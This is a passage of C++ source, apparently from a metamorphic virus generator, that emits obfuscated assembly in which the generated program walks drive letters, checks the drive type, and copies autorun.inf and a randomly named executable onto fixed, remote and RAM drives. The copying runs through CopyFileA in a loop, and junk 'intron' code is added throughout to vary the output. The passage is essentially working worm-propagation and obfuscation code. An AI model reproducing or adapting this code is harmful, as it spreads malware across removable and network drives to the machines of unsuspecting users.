2954. addnumber("0x0040");
2955. file << "                       _push" << endl; CreateAnIntron();
2956.  
2957. zer0(1);
2958. addnumber("3");
2959. subsaved(1);
2960. file << "                       _JnzDown        ; Is DRIVE_FIXED?" << endl;
2961. file << "                           _pop" << endl;
2962. file << "                           _push       ; RegB=0x0040 -> FILE" << endl;
2963. file << "                           _nopdB" << endl;
2964. file << "                           _nopREAL" << endl;
2965.  
2966. file << "                       _pop            ; Trash away" << endl; CreateAnIntron();
2967.  
2968. zer0(1);
2969. addnumber("0x0010");
2970. file << "                       _push" << endl; CreateAnIntron();
2971.  
2972. zer0(1);
2973. addnumber("4");
2974. subsaved(1);
2975. file << "                       _JnzDown        ; Is DRIVE_REMOTE?" << endl;
2976. file << "                           _pop" << endl;
2977. file << "                           _push       ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2978. file << "                           _nopdB" << endl;
2979. file << "                           _nopREAL" << endl;
2980.  
2981.  
2982. zer0(1);
2983. addnumber("6");
2984. subsaved(1);
2985. file << "                       _JnzDown        ; Is DRIVE_RAMDISK?" << endl;
2986. file << "                           _pop" << endl;
2987. file << "                           _push       ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2988. file << "                           _nopdB" << endl;
2989. file << "                           _nopREAL" << endl;
2990.  
2991. file << "                       _pop            ; Trash away" << endl; CreateAnIntron();
2992.  
2993. file << "               ; ############################################################################" << endl; CreateAnIntron();
2994. file << "               ; ##### Copy autorun.inf (or not)" << endl; CreateAnIntron();
2995. file << "       " << endl; CreateAnIntron();
2996. GetAddress("autoruninf");
2997. file << "                       _nopdA               ; address to " << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
2998. GetAddress("Driveletter2");
2999. file << "                       _nopdD               ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3000. file << "       " << endl; CreateAnIntron();
3001. file << "                       _nopsB" << endl; CreateAnIntron();
3002. file << "                       _save" << endl; CreateAnIntron();
3003. file << "       " << endl; CreateAnIntron();
3004. file << "       " << endl; CreateAnIntron();
3005. zer0(1);
3006. addnumber("0x0010");
3007. subsaved(1);
3008. file << "                       _JnzDown" << endl;
3009. file << "                           _nopREAL             ; BC1=0x0" << endl;
3010. file << "                           _push                ; bFailIfExists=FALSE" << endl;
3011. file << "                           _nopsD" << endl;
3012. file << "                           _push                ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3013. file << "               " << endl; CreateAnIntron();
3014. file << "               " << endl; CreateAnIntron();
3015. GetAddress("hCopyFileA");
3016. file << "                       _getdata" << endl; CreateAnIntron();
3017. file << "                       _nopdD" << endl; CreateAnIntron();
3018. file << "       " << endl; CreateAnIntron();
3019. zer0(1);
3020. addnumber("0x0010");
3021. subsaved(1);
3022. file << "                       _JnzDown" << endl;
3023. file << "                           _nopsA" << endl;
3024. file << "                           _push                ; lpExistingFileName=" << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3025. file << "                           _nopsD" << endl;
3026. file << "                           _call                ; stdcall dword[hCopyFileA]" << endl;
3027. file << "       " << endl; CreateAnIntron();
3028.  
3029. file << "                       _nopsB" << endl; CreateAnIntron();
3030. file << "                       _save                ; restore BC2 (=RegB)" << endl; CreateAnIntron();
3031.  
3032. zer0(1);
3033. addnumber("0x0040");
3034. file << "                       _push" << endl; CreateAnIntron();
3035.  
3036. zer0(1);
3037. addnumber("0x0010");
3038. subsaved(1);
3039. file << "                       _JnzDown" << endl;
3040. file << "                           _pop" << endl;
3041. file << "                           _push" << endl;
3042. file << "                           _nopdB" << endl;
3043. file << "                           _save             ; also copy child executable" << endl;
3044.  
3045. file << "                       _pop            ; Trash away" << endl; CreateAnIntron();
3046.  
3047. file << "               " << endl; CreateAnIntron();
3048. file << "               ; ##### End Copy autorun.inf (or not)" << endl; CreateAnIntron();
3049. file << "               ; ############################################################################" << endl; CreateAnIntron();
3050.  
3051.  
3052. file << "               ; ############################################################################" << endl; CreateAnIntron();
3053. file << "               ; ##### Copy child executable (or not)" << endl; CreateAnIntron();
3054. file << "               " << endl; CreateAnIntron();
3055. GetAddress("Driveletter1+2");
3056. file << "                       _saveWrtOff" << endl; CreateAnIntron();
3057. zer0(1);
3058. addnumber("0x5C");
3059. file << "                       _writeByte" << endl; CreateAnIntron();
3060. file << "               " << endl; CreateAnIntron();
3061. GetAddress("RandomFileName");
3062. file << "                       _nopdA               ; address to " << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
3063. GetAddress("Driveletter1");
3064. file << "                       _nopdD               ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3065. file << "               " << endl; CreateAnIntron();
3066. file << "                       _nopsB" << endl; CreateAnIntron();
3067. file << "                       _save" << endl; CreateAnIntron();
3068. file << "               " << endl; CreateAnIntron();
3069. zer0(1);
3070. addnumber("0x0040");
3071. subsaved(1);
3072. file << "                       _JnzDown" << endl;
3073. file << "                           _nopREAL" << endl;
3074. file << "                           _push                ; bFailIfExists=FALSE" << endl;
3075. file << "                           _nopsD" << endl;
3076. file << "                           _push                ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3077. file << "               " << endl; CreateAnIntron();
3078. file << "               " << endl; CreateAnIntron();
3079. GetAddress("hCopyFileA");
3080. file << "                       _getdata" << endl; CreateAnIntron();
3081. file << "                       _nopdD" << endl; CreateAnIntron();
3082. file << "               " << endl; CreateAnIntron();
3083. zer0(1);
3084. addnumber("0x0040");
3085. subsaved(1);
3086. file << "                       _JnzDown" << endl;
3087. file << "                           _nopsA" << endl;
3088. file << "                           _push                ; lpExistingFileName=" << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3089. file << "                           _nopsD" << endl;
3090. file << "                           _call                ; stdcall dword[hCopyFileA]" << endl;
3091.  
3092. file << "               ; ##### End Copy child executable (or not)" << endl; CreateAnIntron();
3093. file << "               ; ############################################################################" << endl; CreateAnIntron();
3094.  
3095. file << "               _popall" << endl; CreateAnIntron();
3096. file << "       " << endl; CreateAnIntron();
3097. GetAddress("Driveletter1");
3098. file << "               _saveWrtOff" << endl; CreateAnIntron();
3099. file << "               _getdata" << endl; CreateAnIntron();
3100. addnumber("1");
3101. file << "               _writeByte" << endl; CreateAnIntron();
3102. file << "       " << endl; CreateAnIntron();
3103. GetAddress("Driveletter2");
3104. file << "               _saveWrtOff" << endl; CreateAnIntron();
3105. file << "               _getdata" << endl; CreateAnIntron();
3106. addnumber("1");
3107. file << "               _writeByte" << endl; CreateAnIntron();
3108. file << "       " << endl; CreateAnIntron();
3109. file << "       " << endl; CreateAnIntron();
3110. file << "               _nopsA" << endl; CreateAnIntron();
3111. file << "               _sub0001" << endl; CreateAnIntron();
3112. file << "               _nopdA" << endl; CreateAnIntron();
3113. file << "       " << endl; CreateAnIntron();
3114. file << "               _JnzUp" << endl; CreateAnIntron();
3115.  
3116. file << "       _popall" << endl; CreateAnIntron();
3117. zer0(0);
3118. addnumber("0x6666");
3119. file << "       _push" << endl; CreateAnIntron();
3120. CallAPI("hSleep");
3121.  
3122.  
3123. zer0(0);
3124. addnumber("1");
3125. file << "       _JnzUp" << endl; CreateAnIntron();
3126.  
3127. file << "" << endl;
3128. file << "EndAminoAcids1:" << endl;
3129. file << "" << endl;
3130. file << "; ##################################################################" << endl;
3131. file << "" << endl;
3132. for (int i=0; i<500; i++) { CreateAnIntron(); }
3133. file << "EndAmino:" << endl;
3134. for (int i=0; i<500; i++) { CreateAnIntron(); }
3135. file << ".end start";
3136.  
3137.        
3138.     file.close();
3139.     cout << "Created:" << endl;
3140.     cout << "Translator Introns: " << cIntronN << endl;
3141.     cout << "Codon Start/Stop Introns: " << IntronSTST << endl;
3142.     cout << "Codon NOP Introns: " << IntronNOP << endl << endl;    
3143.     cout << "Finish :)" << endl;
3144.     //cin.get();
3145.     return(666);
3146. }